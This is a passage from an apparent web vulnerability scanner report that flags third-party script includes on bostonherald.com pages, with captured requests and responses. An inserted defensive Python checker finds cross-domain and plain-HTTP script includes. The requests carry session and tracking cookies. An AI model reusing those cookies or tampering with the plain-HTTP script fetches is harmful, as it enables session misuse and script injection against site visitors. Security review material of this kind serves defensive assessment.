<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<!-- // article.t
...[SNIP]...
</script> -->

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js?1=21" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
   

       <script src="http://cache.heraldinteractive.com/js/ajax.js?nocache=1234" type="text/javascript"></script>
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
   -->


<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="text"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js">
</script>
...[SNIP]...
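
The check behind findings of this type, as an added example that is not part of the scanner report or of any of the sites' own code. It takes a page URL and the HTML of its response, lists every `<script src>` whose host differs from the page's host, and additionally flags includes fetched over plain `http://`. That flag is the point the report's "Information" severity understates: every third-party script in the responses above is loaded over plain HTTP, so not only the third party but anyone who can tamper with those fetches on the network path gets script execution in the www.bostonherald.com origin. The sample page is constructed from the script tags visible in the responses above, plus constructed tags (a commented-out include on a made-up host, a same-origin include, an https include, a protocol-relative include) to exercise the edge cases; the function names are this example's own, not the scanner's.

```python
"""Added example (not part of the scanner report): reproduce the
'cross-domain script include' check over a captured HTML response.

Given the page URL and the response body, it lists every <script src> whose
host differs from the page's host and flags those fetched over plain http://.
"""
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit


class _ScriptSrcCollector(HTMLParser):
    """Collect src attributes of <script> start tags.

    HTMLParser does not report tags inside <!-- ... --> comments, so a
    commented-out include is not counted, matching what a browser loads.
    """

    def __init__(self):
        super().__init__()
        self.srcs = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() != "script":
            return
        for name, value in attrs:
            if name.lower() == "src" and value and value.strip():
                self.srcs.append(value.strip())


def cross_domain_scripts(page_url, html):
    """Return one dict per distinct external script: url, host, plain_http."""
    page_host = urlsplit(page_url).hostname
    if not page_host:
        raise ValueError("page_url must be absolute: %r" % page_url)
    page_host = page_host.lower()

    collector = _ScriptSrcCollector()
    collector.feed(html)
    collector.close()

    findings, seen = [], set()
    for src in collector.srcs:
        # urljoin resolves relative (/js/x.js) and protocol-relative (//host/x.js)
        # sources the way the browser would, inheriting the page's scheme.
        absolute = urljoin(page_url, src)
        parts = urlsplit(absolute)
        host = (parts.hostname or "").lower()
        if not host or host == page_host:
            continue  # same host as the page: not a cross-domain include
        if absolute in seen:
            continue  # the same URL included twice counts once
        seen.add(absolute)
        findings.append({
            "url": absolute,
            "host": host,
            # A plain-http fetch can be replaced by anyone on the network path,
            # and the replacement runs in the including page's origin.
            "plain_http": parts.scheme.lower() == "http",
        })
    return findings


def external_hosts(findings):
    """Distinct third-party hosts, sorted, as the report's issue detail lists them."""
    return sorted({f["host"] for f in findings})


# Constructed sample: script tags as seen in the captured bostonherald.com
# responses, plus constructed edge cases noted inline.
SAMPLE_PAGE_URL = "http://www.bostonherald.com/business/healthcare/"
SAMPLE_HTML = """<!DOCTYPE html>
<html><head>
<!-- commented-out include (constructed), must not be counted:
<script src="http://old.example.invalid/legacy.js"></script> -->
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
<script src="/js/local.js" type="text/javascript"></script>
<script type="text/javascript" src="https://s7.addthis.com/js/200/addthis_widget.js"></script>
<script type="text/javascript" src="//edge.quantserve.com/quant.js"></script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
</head><body></body></html>
"""


if __name__ == "__main__":
    found = cross_domain_scripts(SAMPLE_PAGE_URL, SAMPLE_HTML)
    for f in found:
        print("%-6s %s" % ("http!" if f["plain_http"] else "https", f["url"]))
    print("hosts:", ", ".join(external_hosts(found)))
```

Run against a saved response, the `plain_http` entries are the ones to raise above "Information": the protocol-relative `//edge.quantserve.com/quant.js` inherits the page's `http://` scheme and is flagged the same as an absolute `http://` URL, while the commented-out include and the same-origin `/js/local.js` are ignored, as a browser would ignore them.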

18.607. http://www.bostonherald.com/business/healthcare/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /business/healthcare/

Issue detail

The response dynamically includes the following scripts from other domains (hosts taken from the script tags in the captured response body below; the capture is truncated, so the list may be incomplete):
ajax.googleapis.com, cache.heraldinteractive.com, pagead2.googlesyndication.com, edge.quantserve.com

Request

GET /business/healthcare/ HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 03:25:09 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 51822

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

<!-- // subsection_chi.tmpl //
...[SNIP]...
<meta name="y_key" content="cb9ab47057816fba" />

<script src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js" type="text/javascript"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/common.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/ajax.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js">
</script>
...[SNIP]...

18.608. http://www.bostonherald.com/business/media/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /business/media/

Issue detail

The response dynamically includes the following scripts from other domains (hosts taken from the script tags in the captured response body below; the capture is truncated, so the list may be incomplete):
ajax.googleapis.com, cache.heraldinteractive.com, pagead2.googlesyndication.com, edge.quantserve.com

Request

GET /business/media/ HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 03:24:53 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 52986

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

<!-- // subsection_chi.tmpl //
...[SNIP]...
<meta name="y_key" content="cb9ab47057816fba" />

<script src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js" type="text/javascript"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/common.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/ajax.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js">
</script>
...[SNIP]...

18.609. http://www.bostonherald.com/business/real_estate/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /business/real_estate/

Issue detail

The response dynamically includes the following scripts from other domains (hosts taken from the script tags in the captured response body below; the capture is truncated, so the list may be incomplete):
ajax.googleapis.com, cache.heraldinteractive.com, pagead2.googlesyndication.com, edge.quantserve.com

Request

GET /business/real_estate/ HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 03:19:35 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 61241

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

<!-- // subsection_chi.tmpl //
...[SNIP]...
<meta name="y_key" content="cb9ab47057816fba" />

<script src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js" type="text/javascript"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/common.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/ajax.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js">
</script>
...[SNIP]...

18.610. http://www.bostonherald.com/business/real_estate/view/20110126home_sales_drop_prices_rise_in_2010/srvc=home&position=also

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /business/real_estate/view/20110126home_sales_drop_prices_rise_in_2010/srvc=home&position=also

Issue detail

The response dynamically includes the following scripts from other domains (hosts taken from the script tags in the captured response body below; the capture is truncated, so the list may be incomplete):
ajax.googleapis.com, cache.heraldinteractive.com, s7.addthis.com, d.yimg.com, pagead2.googlesyndication.com, edge.quantserve.com

Request

GET /business/real_estate/view/20110126home_sales_drop_prices_rise_in_2010/srvc=home&position=also HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 03:19:05 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 41575

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<!-- // article.t
...[SNIP]...
</script> -->

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js?1=21" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
   

       <script src="http://cache.heraldinteractive.com/js/ajax.js?nocache=1234" type="text/javascript"></script>
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
   -->


<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="text"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js">
</script>
...[SNIP]...

18.611. http://www.bostonherald.com/business/real_estate/view/20110127foreclosure_activity_up_across_most_us_metro_areas/srvc=home&position=also

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /business/real_estate/view/20110127foreclosure_activity_up_across_most_us_metro_areas/srvc=home&position=also

Issue detail

The response dynamically includes the following scripts from other domains (hosts taken from the script tags in the captured response body below; the capture is truncated, so the list may be incomplete):
ajax.googleapis.com, cache.heraldinteractive.com, s7.addthis.com, d.yimg.com, pagead2.googlesyndication.com, edge.quantserve.com

Request

GET /business/real_estate/view/20110127foreclosure_activity_up_across_most_us_metro_areas/srvc=home&position=also HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 03:18:13 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 45286

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<!-- // article.t
...[SNIP]...
</script> -->

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js?1=21" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
   

       <script src="http://cache.heraldinteractive.com/js/ajax.js?nocache=1234" type="text/javascript"></script>
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
   -->


<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="text"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js">
</script>
...[SNIP]...

18.612. http://www.bostonherald.com/business/real_estate/view/20110128robotics_firm_relocating_to_hubs_innovation_district/srvc=home&position=also

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /business/real_estate/view/20110128robotics_firm_relocating_to_hubs_innovation_district/srvc=home&position=also

Issue detail

The response dynamically includes the following scripts from other domains (hosts taken from the script tags in the captured response body below; the capture is truncated, so the list may be incomplete):
ajax.googleapis.com, cache.heraldinteractive.com, s7.addthis.com, d.yimg.com, pagead2.googlesyndication.com, edge.quantserve.com

Request

GET /business/real_estate/view/20110128robotics_firm_relocating_to_hubs_innovation_district/srvc=home&position=also HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 03:17:20 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 40254

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<!-- // article.t
...[SNIP]...
</script> -->

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js?1=21" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
   

       <script src="http://cache.heraldinteractive.com/js/ajax.js?nocache=1234" type="text/javascript"></script>
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
   -->


<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="text"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js">
</script>
...[SNIP]...

18.613. http://www.bostonherald.com/business/real_estate/view/20110128winona_rydes_off_into_sunset/srvc=home&position=also

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /business/real_estate/view/20110128winona_rydes_off_into_sunset/srvc=home&position=also

Issue detail

The response dynamically includes the following scripts from other domains (hosts taken from the script tags in the captured response body below; the capture is truncated, so the list may be incomplete):
ajax.googleapis.com, cache.heraldinteractive.com, s7.addthis.com, d.yimg.com, pagead2.googlesyndication.com, edge.quantserve.com

Request

GET /business/real_estate/view/20110128winona_rydes_off_into_sunset/srvc=home&position=also HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 03:17:57 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 38214

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<!-- // article.t
...[SNIP]...
</script> -->

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js?1=21" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
   

       <script src="http://cache.heraldinteractive.com/js/ajax.js?nocache=1234" type="text/javascript"></script>
